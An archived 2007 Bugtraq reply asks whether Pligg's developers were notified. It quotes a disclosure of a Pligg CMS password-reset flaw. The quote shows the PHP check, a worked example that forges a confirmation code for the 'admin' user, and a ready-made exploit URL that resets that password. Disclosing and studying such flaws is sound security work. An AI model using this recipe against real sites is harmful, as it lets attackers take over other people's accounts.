lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Sat, 26 May 2007 12:27:54 +0530
From: "crazy frog crazy frog" <i.m.crazy.frog@...il.com>
To: "242th section" <242th.section@...il.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Pligg critical vulnerability

have you notified to the pligg developers?i think they have well
defined policy for discloser?

On 5/25/07, 242th section <242th.section@...il.com> wrote:
> Pligg critical vulnerability
>
> Concerned version  : 9.5 and ?
>
> Description :
>
> Pligg is a flexible CMS based on PHP and MYSQL.
>
> To reinitialize a forgotten password, Pligg follows a classical
> process. A confirmation code is generated and sent by email to the
> concerned user mail box. The user has to follow the link containing
> the confirmation code and if the confirmation code is checked
> successfully, the password is reinitialized to a pre-defined value.
>
>
> you can find a part of the source code in charge of this check below :
>
>
> WEB_ROOT/libs/html1.php
>
>
> […]
>
> function generateHash($plainText, $salt = null){
>
>     if ($salt === null) {
>
>         $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); }
>
>     else {
>
>         $salt = substr($salt, 0, SALT_LENGTH);
>
>         }
>
>     return $salt . sha1($salt . $plainText);
>
> }
>
> […]
>
>
>
> WEB_ROOT/login.php :
>
>
> […]
>
> $confirmationcode = $_GET["confirmationcode"];
>
> if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH))
> == $confirmationcode){
>
> $db->query('UPDATE `' . table_users . '` SET `user_pass` =
> "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`
> = "'.$username.'"');
>
> […]
>
>
>
> Unfortunately, as you can read, you can easily generate, for a given
> username, a confirmation code that passes successfully the following
> check "if(generateHash($username, substr($confirmationcode, 0,
> SALT_LENGTH)) == $confirmationcode)"
>
>
> Example :
>
>
> Let's choose :
> salt = 123456789
>
> and,
>
> username = admin
>
>  we have :
>
> sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7
>
> and  thus :
>
> confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
>
> with the following url you can reinitialize the user admin password :
>
>
> http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
>
>
> 242th.section.
>


-- 
---------------------------------------
http://www.secgeeks.com
get a blog on SecGeeks :)
register here:-
http://secgeeks.com/user/register
rss feeds :-
http://secradar.com/node/feed

http://www.newskicks.com
Submit and kick for new stories from all around the world.
---------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ